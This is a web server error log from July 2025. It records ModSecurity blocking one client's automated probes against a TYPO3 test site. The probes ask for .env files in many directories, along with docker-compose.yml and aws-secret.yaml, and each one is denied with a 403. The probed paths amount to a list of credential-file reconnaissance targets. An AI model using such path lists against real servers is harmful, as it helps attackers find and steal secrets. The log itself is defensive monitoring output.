[Sun Jul 27 09:04:49.015916 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjCgAAABY"]
[Sun Jul 27 09:04:49.016062 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjCgAAABY"]
[Sun Jul 27 09:04:49.037742 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jul 27 09:04:49.098957 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjDQAAABY"]
[Sun Jul 27 09:04:49.099178 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjDQAAABY"]
[Sun Jul 27 09:04:49.099334 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjDQAAABY"]
[Sun Jul 27 09:04:49.159670 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Sun Jul 27 09:04:49.182083 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEAAAABY"]
[Sun Jul 27 09:04:49.182333 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEAAAABY"]
[Sun Jul 27 09:04:49.182518 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEAAAABY"]
[Sun Jul 27 09:04:49.204110 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sun Jul 27 09:04:49.226615 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEgAAABY"]
[Sun Jul 27 09:04:49.226841 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEgAAABY"]
[Sun Jul 27 09:04:49.227005 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEgAAABY"]
[Sun Jul 27 09:04:49.249280 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEwAAABY"]
[Sun Jul 27 09:04:49.249540 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEwAAABY"]
[Sun Jul 27 09:04:49.249733 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjEwAAABY"]
[Sun Jul 27 09:04:49.271948 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFAAAABY"]
[Sun Jul 27 09:04:49.272211 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFAAAABY"]
[Sun Jul 27 09:04:49.272397 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFAAAABY"]
[Sun Jul 27 09:04:49.294709 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFQAAABY"]
[Sun Jul 27 09:04:49.294939 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFQAAABY"]
[Sun Jul 27 09:04:49.295122 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFQAAABY"]
[Sun Jul 27 09:04:49.317288 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFgAAABY"]
[Sun Jul 27 09:04:49.317513 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFgAAABY"]
[Sun Jul 27 09:04:49.317678 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjFgAAABY"]
[Sun Jul 27 09:04:49.339972 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIXPkeWBJAKUjtGl5KHjFwAAABY"]
[Sun Jul 27 09:04:49.340208 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIXPkeWBJAKUjtGl5KHjFwAAABY"]
[Sun Jul 27 09:04:49.340403 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aIXPkeWBJAKUjtGl5KHjFwAAABY"]
[Sun Jul 27 09:04:49.362590 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIXPkeWBJAKUjtGl5KHjGAAAABY"]
[Sun Jul 27 09:04:49.362824 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIXPkeWBJAKUjtGl5KHjGAAAABY"]
[Sun Jul 27 09:04:49.362992 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aIXPkeWBJAKUjtGl5KHjGAAAABY"]
[Sun Jul 27 09:04:49.385399 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIXPkeWBJAKUjtGl5KHjGQAAABY"]
[Sun Jul 27 09:04:49.385753 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIXPkeWBJAKUjtGl5KHjGQAAABY"]
[Sun Jul 27 09:04:49.386001 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aIXPkeWBJAKUjtGl5KHjGQAAABY"]
[Sun Jul 27 09:04:49.930804 2025] [authz_core:error] [pid 1495876] [client 185.177.72.115:16562] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Sun Jul 27 09:04:49.968775 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjHwAAABY"]
[Sun Jul 27 09:04:49.969008 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjHwAAABY"]
[Sun Jul 27 09:04:49.969170 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aIXPkeWBJAKUjtGl5KHjHwAAABY"]
[Sun Jul 27 09:04:50.021125 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIAAAABY"]
[Sun Jul 27 09:04:50.021365 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIAAAABY"]
[Sun Jul 27 09:04:50.021550 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIAAAABY"]
[Sun Jul 27 09:04:50.076973 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIQAAABY"]
[Sun Jul 27 09:04:50.077201 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjIQAAABY"]
